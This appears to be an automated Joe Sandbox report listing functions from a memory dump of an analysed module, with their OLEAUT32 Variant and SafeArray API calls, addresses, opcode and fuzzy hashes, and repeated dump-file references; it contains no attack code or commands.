API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
String ID:
API String ID: 3403836469-0
Opcode ID: 1ddb8337ae22f2d1ff4e696e5ac35afc6884bc281035bc08cf6b9574ab6eaaa7
Instruction ID: ca17109b8443e6299a3e3f368843bf51c146575879d25371bd2758ea4e9eb7dc
Opcode Fuzzy Hash: 1ddb8337ae22f2d1ff4e696e5ac35afc6884bc281035bc08cf6b9574ab6eaaa7
Instruction Fuzzy Hash: 23C16BB2A043459FD700DFA8C88495BB7F9FB89308F25496DE659CB750D731E806CBA2

Function 6CEBD410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CEBD4B3
VariantInit.OLEAUT32 ref: 6CEBD4C5
VariantInit.OLEAUT32(?), ref: 6CEBD4CC
_malloc.LIBCMT ref: 6CEBD551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBD58B
SafeArrayCreateVector.OLEAUT32 ref: 6CEBD5A6
SafeArrayAccessData.OLEAUT32 ref: 6CEBD5B8

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
String ID:
API String ID: 1552365394-0
Opcode ID: 494f33569bf8de0ffcee1fe55dbc64e8829d4d2abadaacce697e34a3b4c435a0
Instruction ID: c1ca330667da396a15ad396a2c53d71742185cd892458ea43c12918b0a4db1c4
Opcode Fuzzy Hash: 494f33569bf8de0ffcee1fe55dbc64e8829d4d2abadaacce697e34a3b4c435a0
Instruction Fuzzy Hash: 6CB156796083019FD314CF28C980A6ABBF9FF89318F25895DE895A7754E730E905CB92

Function 6CEBD468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CEBD4B3
VariantInit.OLEAUT32 ref: 6CEBD4C5
VariantInit.OLEAUT32(?), ref: 6CEBD4CC
_malloc.LIBCMT ref: 6CEBD551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBD58B
SafeArrayCreateVector.OLEAUT32 ref: 6CEBD5A6
SafeArrayAccessData.OLEAUT32 ref: 6CEBD5B8
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBD601
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBD63E

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
String ID:
API String ID: 2723946344-0
Opcode ID: db51352bc46ce34cdb06e0f22f50243841989fbd48dc9f60252a738d30986e62
Instruction ID: 3715c311e6b1a6c1b5cf28f1eed14ace30cacbd450cb0c7ee43f7402157fe4f4
Opcode Fuzzy Hash: db51352bc46ce34cdb06e0f22f50243841989fbd48dc9f60252a738d30986e62
Instruction Fuzzy Hash: FC9178B96043019FD304CF28C980A6BBBF9BFC9318F25895CE895AB755D770EA05CB52

Function 6CEB5140 Relevance: 21.2, APIs: 14, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEB5177

Part of subcall function 6CEC2820: _malloc.LIBCMT ref: 6CEC2871

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6CEB51B9
SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CEB51D5
SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6CEB51E5
_memmove.LIBCMT ref: 6CEB51FF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEB5208
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEB522C
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CEB5263
VariantClear.OLEAUT32(?), ref: 6CEB526C
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CEB52AD
VariantClear.OLEAUT32(?), ref: 6CEB52B6
SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6CEB52D2
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB534E
VariantClear.OLEAUT32(?), ref: 6CEB5358

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
String ID:
API String ID: 452649785-0
Opcode ID: 10d6f060ccdebe208a24996a9d6ec868b51ccbfe9243c763bc58f37ee03ebbed
Instruction ID: 758f9155508a16b3c36b7b4815a7e6576a8915d14f5214cb08ce03c6d9330eb4
Opcode Fuzzy Hash: 10d6f060ccdebe208a24996a9d6ec868b51ccbfe9243c763bc58f37ee03ebbed
Instruction Fuzzy Hash: 4F7139B1A0120AABDB01CFA5C985BAFBBB8FF49714F108119E915A7740D774E905CBA0

Function 6CEB44C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEB44FF
VariantInit.OLEAUT32(?), ref: 6CEB4505
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEB4516
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEB4551
VariantClear.OLEAUT32(?), ref: 6CEB455A
SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CEB4579
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEB4594
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CEB45B5
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CEB45CE
std::tr1::_Xweak.LIBCPMT ref: 6CEB475A
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB4777
VariantClear.OLEAUT32(?), ref: 6CEB4787
VariantClear.OLEAUT32(?), ref: 6CEB478D

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
String ID:
API String ID: 1304965753-0
Opcode ID: 4f4604f51849ca357b6f15b1bb84d7d78c349998baeb59713df8f5987007cab4
Instruction ID: 09ae4bff49cdef5fc40055224da547506037668b68affe2c2bf2fb6cb9ae3fb7
Opcode Fuzzy Hash: 4f4604f51849ca357b6f15b1bb84d7d78c349998baeb59713df8f5987007cab4
Instruction Fuzzy Hash: C5A12D75A012069BDB54DB94C984EAFB7B9FF8C714F14462DE506ABB81C630E941CBA0

Function 6CEBBF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEBBF3D
VariantInit.OLEAUT32(?), ref: 6CEBBF4A
VariantInit.OLEAUT32(?), ref: 6CEBBF50
VariantInit.OLEAUT32(?), ref: 6CEBBF56
VariantInit.OLEAUT32 ref: 6CEBC04D
VariantCopy.OLEAUT32(?,?), ref: 6CEBC054
VariantInit.OLEAUT32 ref: 6CEBC085
VariantCopy.OLEAUT32(?,?), ref: 6CEBC08C
VariantClear.OLEAUT32(?), ref: 6CEBC118
VariantClear.OLEAUT32(?), ref: 6CEBC11E
VariantClear.OLEAUT32(?), ref: 6CEBC124
VariantClear.OLEAUT32(?), ref: 6CEBC12A

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 323189114d7fc15460761a80aca24a609f9104c6752dcaf2253963a64e7ce14f
Instruction ID: 35889aad7bc76b396f783152d4f3e31b07c9c733758ba1bbb36d10090ff20bd9
Opcode Fuzzy Hash: 323189114d7fc15460761a80aca24a609f9104c6752dcaf2253963a64e7ce14f
Instruction Fuzzy Hash: 7B81AE71A01219AFCB04DFA8C980FEEBBB9FF49308F24415DE905AB740DB70A905CB90

Function 6CEB64D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CEB650C
VariantInit.OLEAUT32(?), ref: 6CEB6519
VariantInit.OLEAUT32(?), ref: 6CEB6520
SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6CEB6531
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB656D
VariantClear.OLEAUT32(?), ref: 6CEB6576
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB65B6
VariantClear.OLEAUT32(?), ref: 6CEB65BF
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB6666
VariantClear.OLEAUT32(?), ref: 6CEB6677
VariantClear.OLEAUT32(?), ref: 6CEB667E
VariantClear.OLEAUT32(?), ref: 6CEB6685

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: 223000a2cf96be24a33ef84d5ba92f83d6c72cb605c8a0caf0c86d0102ebb71d
Instruction ID: 724746e9cbe716007c25f54c1bae186d36a586fae59ace301a81bfa41256f6f1
Opcode Fuzzy Hash: 223000a2cf96be24a33ef84d5ba92f83d6c72cb605c8a0caf0c86d0102ebb71d
Instruction Fuzzy Hash: 4C5137B26083019FC705DF64C880AABBBF8EFC9714F118A1DF95597650EB71E906CB92

Function 6CEBCB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEBCBCA
VariantInit.OLEAUT32(?), ref: 6CEBCBD3
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBCBE4
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBCBF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBCC0D
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CEBCC39
VariantClear.OLEAUT32(?), ref: 6CEBCC42
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CEBCC5D
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CEBCC77
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEBCCEC
VariantClear.OLEAUT32(?), ref: 6CEBCCFC
VariantClear.OLEAUT32(?), ref: 6CEBCD02

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
String ID:
API String ID: 3548156019-0
Opcode ID: e42517bc24245f035cc93fdd0728ab06b40f9167aa35c31cddaa6c4a6607d34e
Instruction ID: 9bd3f9018617493bd9b7cf1b90dbb8181eda1637e46e2abe14274dc1e3a14185
Opcode Fuzzy Hash: e42517bc24245f035cc93fdd0728ab06b40f9167aa35c31cddaa6c4a6607d34e
Instruction Fuzzy Hash: 985141B5E0420A9FDB00DFA8C881EEEBBB8FF59714F11815AE915A7741D770A905CFA0

Function 6CEAA350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEAA393
VariantInit.OLEAUT32(?), ref: 6CEAA39A
VariantInit.OLEAUT32(?), ref: 6CEAA3A1
VariantCopy.OLEAUT32(?,?), ref: 6CEAA3EF
VariantClear.OLEAUT32(?), ref: 6CEAA409
VariantClear.OLEAUT32(?), ref: 6CEAA50A
VariantClear.OLEAUT32(?), ref: 6CEAA511
VariantClear.OLEAUT32(?), ref: 6CEAA518
VariantClear.OLEAUT32(?), ref: 6CEAA55E
VariantClear.OLEAUT32(?), ref: 6CEAA565
VariantClear.OLEAUT32(?), ref: 6CEAA56C

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$Init$Copy
String ID:
API String ID: 3214764494-0
Opcode ID: b4115348d6dde8383ad1592bd36992c0a3c091b616c074ce13334f3da0e7fe65
Instruction ID: 540af0dda041a5f17d546e1c9f54e02c855643e1cbb6a00a9d3e596111ab0671
Opcode Fuzzy Hash: b4115348d6dde8383ad1592bd36992c0a3c091b616c074ce13334f3da0e7fe65
Instruction Fuzzy Hash: B87135726483419FD300DFA9C880A5AB7F9AF89714F108A5DFA59DB791D730E805CF62

Function 6CEBCD20 Relevance: 15.5, APIs: 10, Instructions: 485
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEBCD5C
VariantInit.OLEAUT32(?), ref: 6CEBCD65
VariantInit.OLEAUT32(?), ref: 6CEBCD6B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBCD76
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBCDAA
VariantClear.OLEAUT32(?), ref: 6CEBCDB7
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEBD2A5
VariantClear.OLEAUT32(?), ref: 6CEBD2B5
VariantClear.OLEAUT32(?), ref: 6CEBD2BB
VariantClear.OLEAUT32(?), ref: 6CEBD2C1

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: dc054240c5be91f37fef1a65384be33655bc2a08ef5b8d143a5a051e4199c767
Instruction ID: 240d29fccbffb120334bebd4fbe205924db37227a8d8e22135040328c324a6ec
Opcode Fuzzy Hash: dc054240c5be91f37fef1a65384be33655bc2a08ef5b8d143a5a051e4199c767
Instruction Fuzzy Hash: 7612F575A15745AFC758DB98DD84DAAB3B9BF8C300F14466CF50AABB91CA30F841CB90

Function 6CEB66A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CEB66DB
VariantInit.OLEAUT32 ref: 6CEB66EA
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEB6700
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB673A
VariantClear.OLEAUT32(?), ref: 6CEB6747
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB6787
VariantClear.OLEAUT32(?), ref: 6CEB6794
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB6849
VariantClear.OLEAUT32(?), ref: 6CEB685A
VariantClear.OLEAUT32(?), ref: 6CEB6861

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
String ID:
API String ID: 551789342-0
Opcode ID: 97f3198fedfd5678e0f362d40c55caa02f61f906926823fba1a55d434160381a
Instruction ID: a6215de5e679caf52c42e07711481584f31229078b3140c697b20840a622fd16
Opcode Fuzzy Hash: 97f3198fedfd5678e0f362d40c55caa02f61f906926823fba1a55d434160381a
Instruction Fuzzy Hash: 96518872608201AFC701CF64C944B9BBBF9EFC9728F118619F948AB750D730E905CBA2

Function 6CEB6B10 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CEB6C8B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CEB6CA6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CEB6CC7

Part of subcall function 6CEB5760: std::tr1::_Xweak.LIBCPMT ref: 6CEB5769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEB6CF9

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB6F13
InterlockedCompareExchange.KERNEL32(6CF3C6A4,45524548,4B4F4F4C), ref: 6CEB6F34

Strings

.l, xrefs: 6CEB6F41
.l, xrefs: 6CEB6ECB, 6CEB6EEC, 6CEB6ECE

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID: .l$ .l
API String ID: 2722669376-2945158243
Opcode ID: e298952b90e308d6a49d777f297a36b0e1296aa57743d0efc6b60dcfaebdd02c
Instruction ID: 665c7ceca6aacd30a321ee8a841cdde0230fe947bb40d860ba2507665f5a9cad
Opcode Fuzzy Hash: e298952b90e308d6a49d777f297a36b0e1296aa57743d0efc6b60dcfaebdd02c
Instruction Fuzzy Hash: A8D1EFB1A102059FDB04CFA4C981BEE77B9EF45308F348569E919EBB80D774E905CBA1

Function 6CEB840E Relevance: 13.8, APIs: 9, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB84BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB84D2
SafeArrayGetElement.OLEAUT32 ref: 6CEB850A

Part of subcall function 6CEB3A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3B71
Part of subcall function 6CEB3A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3B83

Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
